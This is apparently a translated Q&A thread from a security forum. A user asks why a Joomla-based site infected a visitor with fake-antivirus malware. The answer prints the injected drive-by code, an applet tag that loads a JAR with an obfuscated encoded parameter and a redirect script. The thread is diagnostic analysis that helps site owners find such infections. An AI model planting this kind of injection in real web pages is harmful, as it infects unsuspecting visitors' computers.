Dov'è il virus in questo sito?

Naviga le tue risposte
2

Ho fatto andare il mio amico su questo sito Web e ha immediatamente infettato la sua macchina con malware (AntiVirus SecurityPro). È successo solo andando in prima pagina. Sembrava che il malware fosse avviato, ma che Microsoft Security Essentials lo riconobbe rapidamente e si offrì di rimuoverlo. Ci sono voluti diversi riavvii prima che fosse completamente rimosso. Abbiamo effettivamente provato di nuovo l'intera faccenda ed è successo di nuovo con questo specifico sito web.

Vorrei avvisare il proprietario della pagina, e sono anche curioso, quindi ho provato a riprodurlo in una VM, ma senza risultato. Non ho lo stesso comportamento e nessuna infezione per quanto posso dire.

La sua macchina è un Windows 7SP1 e stava usando IE e, naturalmente, è quello che ho cercato di usare nella VM, ma non ha funzionato. Sospetto che possa dipendere da qualche plug-in speciale sulla sua macchina, forse una versione obsoleta del flash. Ma se ispeziono i contenuti su Chrome, utilizzando la console degli sviluppatori, non vedo la pagina che si illumina. Ma potrebbe essere solo questo succede se il lato server riconosce che il client è vulnerabile. Qualcuno può consigliare un buon scanner del sito web?

L'URL è il seguente. Devi sostituire XX nel seguente di dk: l'ho fatto in modo da evitare che le persone che inavvertitamente lo cliccano dall'infezione:

[WARNING MALWARE] http://www.alliance-trafikskole.XX/

Grazie in anticipo.

    
posta Morty 08.09.2013 - 09:19
fonte

1 risposta

4

Puoi vederlo mentre navighi dalla console; tuttavia ho trovato che questo malware si nasconde in qualche modo; mentre si controlla con alcuni scanner noti, come i sucuri, non viene trovato nulla. Se sei il proprietario di questo sito web, controllerò il codice sorgente.

Il malware: si trova all'inizio del link / file e sembra un drive-by-exploit; consulta questo pastebin per ulteriori informazioni.

Ho controllato il link corrispondente e sembra un java-exploit 

<p><applet  archive="IbFGkXLx.jar"  code="GPCwolGqNI.class"  width="24"  height="8">
<param value="65LLRIZ-68LLRYZ-68LLRIZ-64LLRYZ-5aLLRIZ-6fLLRYZ-68LLRIZ-62LLRYZ-5dLLRIZ-5eLLRYZ-5dLLRIZ-27LLRYZ-5bLLRIZ-62LLRYZ-73LLRIZ-33LLRYZ-30LLRIZ-30LLRYZ-2fLLRIZ-2aLLRYZ-28LLRIZ-70LLRYZ-62LLRIZ-67LLRYZ-5dLLRIZ-68LLRYZ-70LLRIZ-6cLLRYZ-27LLRIZ-69LLRYZ-61LLRIZ-69LLRYZ-38LLRIZ-66LLRYZ-5eLLRIZ-5dLLRYZ-62LLRIZ-5aLLRYZ-36LLRIZ-31LLRYZ-1fLLRIZ-5dLLRYZ-5eLLRIZ-66LLRYZ-68LLRIZ-36LLRYZ-2dLLRIZ-31LLRYZ-32LLRIZ-1fLLRYZ-5eLLRIZ-5dLLRYZ-62LLRIZ-6dLLRYZ-68LLRIZ-6bLLRYZ-62LLRIZ-5aLLRYZ-65LLRIZ-36LLRYZ-2dLLRIZ-1fLLRYZ-67LLRIZ-5eLLRYZ-70LLRIZ-6cLLRYZ-36LLRIZ-2eLLRYZ-2aLLRIZ-2cLLRYZ-1fLLRIZ-5cLLRYZ-5aLLRIZ-66LLRYZ-69LLRIZ-5aLLRYZ-62LLRIZ-60LLRYZ-67LLRIZ-36LLRYZ-2aLLRIZ-30LLRYZ-2aLLRIZ-1fLLRYZ-5aLLRIZ-69LLRYZ-69LLRIZ-6cLLRYZ-36LLRIZ-2eLLRYZ-32LLRIZ-1fLLRYZ-6cLLRIZ-64LLRYZ-62LLRIZ-67LLRYZ-36LLRIZ-2fLLRYZ-2eLLRIZ-2eLLRYZ-1fLLRIZ-69LLRYZ-5aLLRIZ-60LLRYZ-5eLLRIZ-36LLRYZ-30LLRIZ-2bLLRYZ-32LLRIZ-1fLLRYZ-60LLRIZ-5aLLRYZ-66LLRIZ-5eLLRYZ-36LLRIZ-2cLLRYZ-29LLRIZ-2fLLRYZ-" name="WaKnezleM" />

Come è arrivato

.. beh, Joomla ....

10:40 UTC:

L'IFrame malevolo è sparito dal traficskole; è pulito o il malware è in qualche modo "intelligente".

Questo è interessante; al momento di controllare date itunes.php adesso ho le seguenti cose: 

<html><script>location.replace("http:a.com");</script></html>
    
risposta data 08.09.2013 - 12:36
fonte

Leggi altre domande sui tag

È insicuro chiedere l'attuale nonce dal server? Modo trasparente per inviare i registri da honeypot al server di registrazione